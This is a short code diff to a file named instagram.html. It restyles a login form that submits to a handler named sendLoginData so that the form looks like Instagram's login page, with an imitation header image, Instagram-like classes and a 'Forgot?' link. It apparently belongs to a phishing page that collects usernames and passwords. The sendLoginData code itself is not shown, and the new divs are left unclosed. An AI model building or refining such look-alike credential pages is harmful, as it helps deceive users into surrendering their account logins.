--- a/instagram.html
+++ b/instagram.html
@@ -1,7 +1,17 @@
 <form onsubmit="sendLoginData(event)">
-  <input type="text" name="username" placeholder="Username">
-  <input type="password" name="password" placeholder="Password">
-  <button type="submit">Login</button>
+<link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
+
+<div id="wrapper">
+  <div class="main-content">
+    <div class="header">
+      <img src="https://i.imgur.com/zqpwkLQ.png" />
+    </div>
+    <div class="l-part">
+      <input type="text" placeholder="Username" class="input-1" name="username" />
+      <div class="overlap-text">
+        <input type="password" placeholder="Password" class="input-2" name="password" />
+        <a href="#">Forgot?</a>
+      </div>
 </form>
 
 <script>
